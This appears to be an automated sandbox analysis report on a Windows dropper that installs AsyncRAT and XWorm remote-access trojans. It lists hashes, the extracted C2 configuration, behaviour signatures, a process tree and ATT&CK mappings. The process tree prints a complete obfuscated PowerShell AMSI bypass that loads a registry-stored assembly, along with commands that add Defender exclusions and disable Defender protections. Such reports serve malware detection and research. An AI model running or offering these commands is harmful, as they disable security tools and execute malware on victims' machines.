Analysis

  • max time kernel
    30s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 02:34

General

  • Target

    x4Joexexe.exe

  • Size

    8.3MB

  • MD5

    380ebda713b2e097ecebd5dc2a76bb52

  • SHA1

    c4d558f574e8f6729018b69c60533b39dfd18e76

  • SHA256

    3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211

  • SHA512

    fc0d255ab7468139793fbc39e64e4811863f6fdc3c736086b645c484a20514f2c28b1225438dc6995ab033bec4791c42cc264db80994bdd9ee057394dc2234cc

  • SSDEEP

    196608:c1+tQqVENtzdZ/HtNt4Z/OgVQa8z9fnE:cqqNtz7ft4Z/XV7kVE

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Mr.Joex

C2

seems-radio.gl.at.ply.gg:2519

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    true

  • install_file

    Winhlp32.exe

  • install_folder

    %Temp%

aes.plain

Extracted

Family

xworm

Version

3.1

C2

seems-radio.gl.at.ply.gg:2519

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 26 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:372
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e34059c0-fc00-4aa0-896e-d9bae6dc0c23}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1172
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:684
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:972
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:524
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:548
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1048
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1056
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1204
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2616
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lNeDZmzofVsG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BFmvbUHdSMsKQQ,[Parameter(Position=1)][Type]$swedplhkFa)$HVVSwXOnOag=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'lect'+'e'+'dD'+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+'ryM'+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HVVSwXOnOag.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'e'+'c'+''+[Char](105)+'alN'+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+'ByS'+[Char](105)+'g'+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BFmvbUHdSMsKQQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$HVVSwXOnOag.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'','Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$swedplhkFa,$BFmvbUHdSMsKQQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $HVVSwXOnOag.CreateType();}$szhvYayrTcECg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$yotiUJCtnelVrg=$szhvYayrTcECg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xcNyMyXFUisKyECBBge=lNeDZmzofVsG @([String])([IntPtr]);$JayLQgMxLTEInOxGdxDhOL=lNeDZmzofVsG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QawuKEqExbq=$szhvYayrTcECg.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+'eH'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$puwBXdYhYQgHyA=$yotiUJCtnelVrg.Invoke($Null,@([Object]$QawuKEqExbq,[Object]('L'+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+'b'+''+'r'+''+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$tuJSIQYLNtPtTjrFV=$yotiUJCtnelVrg.Invoke($Null,@([Object]$QawuKEqExbq,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+'t'+[Char](101)+'c'+[Char](116)+'')));$nymvYbV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($puwBXdYhYQgHyA,$xcNyMyXFUisKyECBBge).Invoke(''+[Char](97)+'m'+'s'+'i'+'.'+'d'+'l'+''+[Char](108)+'');$xvlKuOKDtcqpHsqRA=$yotiUJCtnelVrg.Invoke($Null,@([Object]$nymvYbV,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$vOUjfADXpV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tuJSIQYLNtPtTjrFV,$JayLQgMxLTEInOxGdxDhOL).Invoke($xvlKuOKDtcqpHsqRA,[uint32]8,4,[ref]$vOUjfADXpV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xvlKuOKDtcqpHsqRA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tuJSIQYLNtPtTjrFV,$JayLQgMxLTEInOxGdxDhOL).Invoke($xvlKuOKDtcqpHsqRA,[uint32]8,0x20,[ref]$vOUjfADXpV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+'W'+[Char](65)+'RE').GetValue(''+[Char](120)+''+'4'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4856
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1212
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1260
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1312
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1336
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1424
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:2440
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1452
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1476
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1484
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1648
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1696
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1780
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1804
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1848
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1928
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1944
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1996
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2004
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1728
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2172
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2212
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2308
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2456
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2556
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2596
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                    1⤵
                                                                      PID:2660
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                        PID:2684
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2828
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2836
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2856
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2872
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3172
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3400
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3480
                                                                                  • C:\Users\Admin\AppData\Local\Temp\x4Joexexe.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\x4Joexexe.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:5100
                                                                                    • C:\Users\Admin\AppData\Local\Temp\x4svchost.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4472
                                                                                    • C:\Users\Admin\AppData\Local\Temp\x4host.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\x4host.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:752
                                                                                      • C:\Users\Admin\AppData\Local\Temp\x4host.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\x4host.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3272
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\x4host.exe'"
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1016
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\x4host.exe'
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1724
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1664
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                            6⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2452
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2524
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1876
                                                                                    • C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3348
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3296
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:1664
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Mr.Joex.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:904
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:3212
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1252
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:3572
                                                                                          • C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1624
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3644
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3844
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4004
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:8
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4388
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4880
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:2228
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4560
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:4876
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                        1⤵
                                                                                                          PID:3664
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                            PID:2928
                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                            1⤵
                                                                                                              PID:2376
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:2680
                                                                                                              • C:\Windows\System32\alg.exe
                                                                                                                C:\Windows\System32\alg.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4180
                                                                                                              • C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                                                                                                                C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4616
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                                                                                                                1⤵
                                                                                                                  PID:1872
                                                                                                                • C:\Windows\system32\fxssvc.exe
                                                                                                                  C:\Windows\system32\fxssvc.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5084
                                                                                                                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4772
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4964
                                                                                                                • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                  "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:1400
                                                                                                                • \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                                                                                                                  "c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:960
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:808
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  1⤵
                                                                                                                    PID:4652

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Command and Scripting Interpreter

                                                                                                                  1
                                                                                                                  T1059

                                                                                                                  PowerShell

                                                                                                                  1
                                                                                                                  T1059.001

                                                                                                                  Persistence

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  1
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1547.001

                                                                                                                  Privilege Escalation

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  1
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1547.001

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

